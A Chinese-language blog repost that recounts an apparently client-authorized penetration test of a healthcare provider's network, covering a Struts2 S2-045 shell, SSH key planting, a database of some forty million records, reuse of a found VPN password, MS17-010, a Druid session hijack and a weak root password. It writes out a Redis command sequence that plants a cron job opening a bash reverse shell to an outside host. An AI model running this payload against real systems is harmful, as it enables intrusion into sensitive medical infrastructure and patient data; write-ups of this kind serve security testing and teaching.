记一次渗透某医疗系统内网

admin 2023年2月7日12:32:56评论40 views字数 993阅读3分18秒阅读模式

最近的项目,渗透医疗卫生的系统。

过程

一开始客户只给了几个公网开放的cms应用,但是测了一遍只有逻辑漏洞(一分钱挂号啥的),于是用fscan扫了一遍c段。

找到一个

记一次渗透某医疗系统内网

测试了一遍,最终使用s2-045拿到shell。

记一次渗透某医疗系统内网

使用这个工具添加ssh公钥,实现免密登陆,成功进入机器。

然后翻阅各类文件找到jdbc,遂连接:

记一次渗透某医疗系统内网

数据四千万条,通知客户后,继续日站。

在某文件内找到深信服vpn账号密码,于是链接准备日内网。

记一次渗透某医疗系统内网

内网ip为 10.*.200.21,使用fscan和goby收集资产。

客户得知进入内网后给内网渗透的目标站点。

记一次渗透某医疗系统内网

测试某一台机器,发现redis未授权

使用先知文章的例子,https://xz.aliyun.com/t/6103#toc-7 如下:

redis-cli.exe -h 192.168.18.138
config set dir /var/spool/cron
set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.15.3/5555 0>&1\n\n\n"
config set dbfilename root
save

期间遇到很多问题,sslvpn链接找不到自己的内网ip(给的是192啥的,不是10,所以遇到一台不是目标的机器,使用ms17010拿下权限,远程桌面链接准备做跳板)

上传ncat.exe 监听5555端口

记一次渗透某医疗系统内网

自己的机器使用recli链接未授权的redis服务,使用上述的反弹shell命令

等一会啊 shell就弹过来了

记一次渗透某医疗系统内网

于是继续传公钥上去 实现免密登陆,期间遇到各种翻文件,最终登陆系统,发现此系统是核酸检测的,遂退出报告客户

记一次渗透某医疗系统内网

这台机器拿下后测试其他机器,205.77存在Druid未授权访问漏洞。

记一次渗透某医疗系统内网

查看session监控,系统前台登陆后替换自己的session为最近的管理员session进入后台后有个文件管理,直接上传jsp后拿到shell。

(图缺了 搞完太高兴了 没保存)

结果fscan那里显示这台机的ssh是弱口令 root root

记一次渗透某医疗系统内网

好好笑 然后另一台机器不是弱口令,但是相同的方法拿到的shell。

收工。

原文于:https://rce.ink/index/view/312.go原文作者:depy

记一次渗透某医疗系统内网 点击下方小卡片或扫描下方二维码观看更多技术文章记一次渗透某医疗系统内网

记一次渗透某医疗系统内网

师傅们点赞、转发、在看就是最大的支持

原文始发于微信公众号(猪猪谈安全):记一次渗透某医疗系统内网

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月7日12:32:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次渗透某医疗系统内网http://cn-sec.com/archives/1539849.html

发表评论

匿名网友 填写信息